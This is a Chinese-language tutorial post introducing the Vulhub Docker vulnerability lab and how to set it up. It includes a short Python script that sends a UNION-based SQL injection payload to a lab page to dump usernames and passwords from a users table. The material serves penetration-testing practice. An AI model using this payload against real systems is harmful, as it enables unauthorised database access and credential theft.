Vulhub靶場：滲透測試練手好去處

一、什麼是Vulhub靶場

Vulhub是一個Docker環境下的靶機集合，涵蓋了安全領域中的許多知名漏洞。

與傳統的靶場不同，Vulhub通過Docker的方式來構建漏洞環境，方便開發者在自己的電腦上進行滲透測試、安全研究。

它集成了常見的Web漏洞、系統漏洞等，使用者可以在Vulhub中尋找到自己想要攻擊的目標，從而進行實戰練習。

二、Vulhub靶場的特點

1、涵蓋了豐富的漏洞類型：Vulhub集成了Web漏洞、系統漏洞、移動安全等多個方向的漏洞靶場，讓安全從業者可以練習不同類型的漏洞攻擊。

2、方便易用的Docker環境：Vulhub將不同的靶機集成在Docker環境下，避免了繁瑣的軟件安裝、配置過程，使用者只需在自己的電腦上安裝好Docker，即可輕鬆使用。

3、豐富的攻防場景：Vulhub提供了很多攻防場景，例如網絡滲透、Web滲透、二進制漏洞等，讓使用者可以在不同的場景下實踐攻防技術，提高技能。

三、如何使用Vulhub靶場

1、安裝Docker：首先需要在自己的電腦上安裝Docker，可以從官網下載對應的版本，然後按照安裝指南進行安裝。

2、下載並啟動Vulhub：使用者可以從Vulhub的官網上下載相應的靶場鏡像，然後通過Docker啟動即可。

四、示例程序：使用Vulhub進行SQL注入漏洞攻擊

下面給出一個使用Vulhub進行SQL注入漏洞攻擊的示例程序：

from bs4 import BeautifulSoup
import requests

def exploit(url):
    payload = "' union select 1,2,group_concat(username,':',password),4 from users #"
    data = {
        "name": payload,
        "company": "test",
        "mobile": "test",
        "email": "test@test.com",
        "qq": "test",
        "remark": "test"
    }
    response = requests.post(url, data=data)
    soup = BeautifulSoup(response.text, 'html.parser')
    result = soup.find_all('td')[-1].string
    print(result)
    
url = 'http://your-ip/vulhub/sqli-labs/sqli-lab-01-master/sqli-1.php'
exploit(url)

該漏洞環境是Vulhub中的SQL注入靶機，通過使用Python的Requests庫對其進行攻擊，從中獲取了用戶名和密碼。

這個示例程序並不是Vulhub中所有靶場的攻擊方式，只是作為一個演示程序，供大家參考。

五、總結

通過上述分析，我們可以知道Vulhub靶場是一個非常好的滲透測試練手去處，尤其適合初學者進行使用。

除了上述提到的特點之外，Vulhub還可以讓使用者進行自定義配置，添加自己想要學習的靶場環境。

因此，建議安全從業者都應該嘗試一下Vulhub靶場，並在其中不斷學習、進步。